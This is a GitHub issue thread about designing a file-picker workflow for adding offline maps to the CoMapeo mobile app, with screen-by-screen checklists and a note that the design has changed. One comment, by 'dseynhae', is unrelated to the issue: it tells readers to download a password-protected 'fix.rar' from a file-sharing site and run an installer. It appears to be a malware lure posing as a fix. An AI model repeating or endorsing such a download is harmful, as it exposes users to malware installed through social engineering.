### ISSUE TITLE
Map Upload / Success

### ISSUE THREAD

**Issue by ximenabb** [digidem/comapeo-mobile#623]
**Description**
Goal : Improved workflow for importing a background map into CoMapeo, by allowing the user to pick the background map file from a file-picker in the app, rather than requiring the user to place the background map file in a specific location
An interim solution until the Map Manager feature is brought to CoMapeo
To note : 
- Coordinator and Particpants can uploap or remove a map
- Accepted file types are .mbttiles, .mappackage

Relates to https://github.com/digidem/comapeo-mobile/issues/622 https://github.com/digidem/comapeo-mobile/issues/624
**Todo**

## Screen 1
<img width="334" alt="Screen Shot 2024-08-26 at 12 42 49 PM" src="https://github.com/user-attachments/assets/4f958b1e-6064-4891-b663-6d5db54a2924">

- [ ] Display screen as designed
- [ ] Use copy _About Offline Maps_
- [ ] _Adding an offline map will enable you to see a map when you are offline. You can only add one (1) offline map to your CoMapeo project._ 
- [ ] _Only your device will have access to the offline map._
- [ ] Add a  **Choose file**  button
- [ ] Use copy under button _Accepted file types are .mbttiles, .mappackage_

## Screen 2
<img width="357" alt="Screen Shot 2024-08-26 at 12 43 02 PM" src="https://github.com/user-attachments/assets/ed2d8517-0f2a-4a0d-8df9-039ae6bf5f18">

- [ ] If Choose file button clicked, open the devices file manager
- [ ] It will display the accepted file types

## Screen 3
<img width="283" alt="Screen Shot 2024-08-27 at 6 55 33 PM" src="https://github.com/user-attachments/assets/fc85aace-5a0f-47e2-b205-16008c281a34">

- [ ] Display screen as designed
- [ ] Use copy _Offline Map Added_
- [ ] _You will now the available offline areas on the map._
- [ ] Add a  **Close**  button

## Screen 4
<img width="329" alt="Screen Shot 2024-08-26 at 12 43 42 PM" src="https://github.com/user-attachments/assets/f284afef-41a8-4892-9aa8-966597159703">

- [ ] Update Screen 1
- [ ] Display _Map Name_ an _Date Added_
- [ ] Add box and display Map Name and Server Address, under server name
- [ ] Add date added, under date added
- [ ] Add **Remove Map** button
- [ ] Add **Replace Offline Map** button
- [ ] When **Replace Offline Map** button is clicked, go to Screen 1

**Design**
https://www.figma.com/design/iUeC0Qzhb4H0unuPfxQAsM/(Mobile)-CoMapeo?node-id=2179-1778&t=pHGODPSppOLjQUPF-0

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by achou11** [comment]
Noting that as of this writing, the last screenshot provided in the issue is out of date with the relevant figma design:

<img width="200" alt="image" src="https://github.com/user-attachments/assets/1e30f989-7f0d-40aa-9841-99a3b8b0fd55">

Going to assume that figma should be the source of truth so will be implementing based on what's there
